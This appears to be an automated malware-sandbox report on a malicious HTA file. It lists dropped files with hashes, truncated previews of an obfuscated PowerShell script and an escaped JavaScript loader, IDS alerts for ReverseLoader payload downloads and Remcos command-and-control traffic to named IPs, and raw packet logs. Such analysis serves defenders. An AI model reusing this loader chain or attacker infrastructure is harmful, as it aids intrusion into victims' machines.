                                                                                                                                                          Preview:L...U.[g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\1wf2prhw\CSCC38D34038713434CB5EBD437745683DE.TMP....................Z..?A.". 0...........4.......C:\Users\user\AppData\Local\Temp\RESE1B0.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.w.f.2.p.r.h.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2
                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:..
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15728640
                                                                                                                                                          Entropy (8bit):0.10805027086476268
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                                                                                                                                          MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                                                                                                                                          SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                                                                                                                                          SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                                                                                                                                          SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (3102), with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):153774
                                                                                                                                                          Entropy (8bit):3.794572563673094
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:rhOJJc6EynAswUs9Oau841fvkpWKj5fhOJJc6EynAswUs9Oau841fvkpWKjhhOJw:rOLEIpwPRs36WKJOLEIpwPRs36WKtOLs
                                                                                                                                                          MD5:61BCBE69140CDEE35AC40F1D97773746
                                                                                                                                                          SHA1:BB5D746ECA7A18890B642E6952EB9C5F71DEDAAA
                                                                                                                                                          SHA-256:D68723EDCF3FF4F0C7DED177C7EEBD74DF498B8D16B111FAC54F1C11E37C93CF
                                                                                                                                                          SHA-512:303EE3B3B8620F536C3E298BD65557BADF251870CA46656741C8D787A351F3ABCA94FE39BB701563AEF9C7C85F89BBDB447704E1F5BCE1B63701F575DB5E4B0B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:...... . . . .....c.U.U.O.W.U.v.z.v.f.n.p.h.B.m. .=. .".W.x.Q.e.K.L.L.v.b.W.N.b.v.Q.k.".....c.c.e.U.J.o.G.b.k.K.G.h.L.m.d. .=. .".G.W.L.z.L.p.e.L.W.t.O.U.i.G.K.".....r.K.W.i.K.P.K.W.q.W.W.e.N.c.W. .=. .".B.K.c.L.a.K.r.W.Z.i.K.h.W.A.p.".........a.o.k.l.L.q.d.L.a.p.i.s.W.c.G. .=. .".p.n.W.L.n.A.s.Q.e.n.Z.J.j.B.p.".....v.U.S.i.W.c.i.K.S.m.L.B.G.q.j. .=. .".f.p.b.K.K.P.m.n.e.k.k.L.W.u.k.".....i.U.c.A.W.u.I.L.K.S.K.U.L.u.j. .=. .".r.L.b.W.i.U.G.R.o.n.r.m.T.U.q.".....H.c.J.K.W.k.h.i.i.K.c.J.G.G.A. .=. .".G.k.s.Z.W.v.e.O.c.b.L.x.W.i.R.".....z.e.m.L.K.b.L.A.K.A.h.W.e.o.f. .=. .".C.p.i.W.z.G.W.d.c.s.K.N.o.l.K.".....x.L.p.x.i.K.L.o.o.L.m.u.t.m.h. .=. .".J.t.h.G.c.T.L.e.x.m.L.W.c.W.i.".....c.q.B.a.L.h.Z.U.I.C.N.h.K.b.l. .=. .".e.r.f.W.K.L.e.g.L.B.P.b.f.U.W.".....W.q.f.K.z.h.K.b.N.e.a.K.g.L.W. .=. .".x.W.L.f.W.G.i.C.G.C.q.k.c.e.c.".....q.K.I.k.b.p.t.p.b.C.W.U.K.G.u. .=. .".u.h.m.P.a.c.t.n.W.S.W.H.G.G.W.".....R.z.m.R.v.L.L.O.K.G.J.a.x.W.W. .=. .".u.c.a.z.B.e.l.o.Z.o.h.d.K.c.z.".....L.n.G.N.U.Z.T.m.
                                                                                                                                                          File type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                                                                                                          Entropy (8bit):2.63019013871546
                                                                                                                                                          TrID:
                                                                                                                                                            File name:greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
                                                                                                                                                            File size:82'534 bytes
                                                                                                                                                            MD5:fccab384cf7d38618313385c0e22638b
                                                                                                                                                            SHA1:6e0efbb76a4d4b39a82b7d84393f399ea431b07e
                                                                                                                                                            SHA256:fc357d0488d2be1a5a49893d842e24d303250346dad592f6b1c8a9511edc15d2
                                                                                                                                                            SHA512:72c9ba041cbeba138a2e02ac8ccb726c58abaa834386a09c203b9e9f9759e0f4c6e5f2ab3c29ab05f93e573195adb8e43a8a89811505084851eff6748f28a4af
                                                                                                                                                            SSDEEP:768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAgxLiFZpd0LTna8/GdHz6kXd0LcRPi+Bkqr93:tL
                                                                                                                                                            TLSH:C5835707D54BF93CEB8799FBE33C9B2A1386AD11ED8E444F06AC05551BD5ACBB02C894
                                                                                                                                                            File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74
                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                            2024-12-13T07:38:12.054647+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.44973223.95.235.2980TCP
                                                                                                                                                            2024-12-13T07:38:23.463660+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.449733TCP
                                                                                                                                                            2024-12-13T07:38:39.828894+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.449740104.21.84.67443TCP
                                                                                                                                                            2024-12-13T07:38:40.260058+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11104.21.84.67443192.168.2.449740TCP
                                                                                                                                                            2024-12-13T07:38:40.260058+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21104.21.84.67443192.168.2.449740TCP
                                                                                                                                                            2024-12-13T07:38:41.214448+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.21.84.67443192.168.2.449740TCP
                                                                                                                                                            2024-12-13T07:38:42.909162+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449741192.3.101.1496946TCP
                                                                                                                                                            2024-12-13T07:38:45.049735+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449742192.3.101.1496946TCP
                                                                                                                                                            2024-12-13T07:38:45.295457+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449743178.237.33.5080TCP
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Dec 13, 2024 07:38:10.811717987 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:10.932193995 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:10.932311058 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:10.940186024 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:11.060059071 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.054486990 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.054517984 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.054534912 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.054646969 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.054692030 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.054708958 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.054723978 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.054740906 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.054770947 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.054770947 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.054770947 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.054886103 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.055026054 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.055042028 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.055058956 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.055080891 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.055111885 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.174752951 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.174787998 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.174851894 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.174851894 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.246712923 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.246803999 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.246860027 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.246860027 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.250948906 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.251024008 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.251051903 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.251111031 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.259350061 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.259462118 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.259507895 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.259507895 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.267743111 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.267764091 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.267839909 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.267839909 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.276160955 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.276221991 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.276308060 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.276308060 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.284540892 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.284610033 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.284651995 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.284720898 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.292933941 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.293072939 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.293129921 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.293129921 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.301388025 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.301455975 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.301472902 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.301542044 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.309756041 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.309820890 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.309875011 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.309937954 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.318227053 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.318286896 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.318324089 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.318324089 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.325819969 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.325869083 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.325896978 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.326004028 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.438791990 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.438924074 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.438991070 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.438991070 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.441314936 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.441452026 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.441500902 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.441500902 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.446306944 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.446398020 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.446413994 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.446479082 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.451199055 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.451241016 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.451266050 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.451306105 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.456154108 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.456247091 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.456350088 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.456408024 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.461209059 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.461267948 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.461281061 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.461602926 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.465967894 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.466063976 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.466077089 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.466176987 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.470768929 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.470882893 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.470907927 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.470941067 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.475580931 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.475677013 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.475723028 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.475723028 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.480379105 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.480550051 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.480601072 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.480601072 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.485255957 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.485304117 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.485352993 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.485353947 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.490015030 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.490139008 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.490190029 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.490190029 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.494813919 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.494915962 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.494961977 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.494961977 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.499630928 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.499794960 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.499845028 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.499845028 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.504446983 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.504535913 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.504580021 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.504580021 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.509279013 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.511336088 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.631875992 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.632016897 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.632059097 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.632232904 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.634006023 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.634022951 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.634126902 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.636976004 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.637021065 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.637084961 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.637084961 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.640953064 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.641061068 CET4973280192.168.2.423.95.235.29
                                                                                                                                                            Dec 13, 2024 07:38:12.641063929 CET804973223.95.235.29192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:12.641144037 CET4973280192.168.2.423.95.235.29
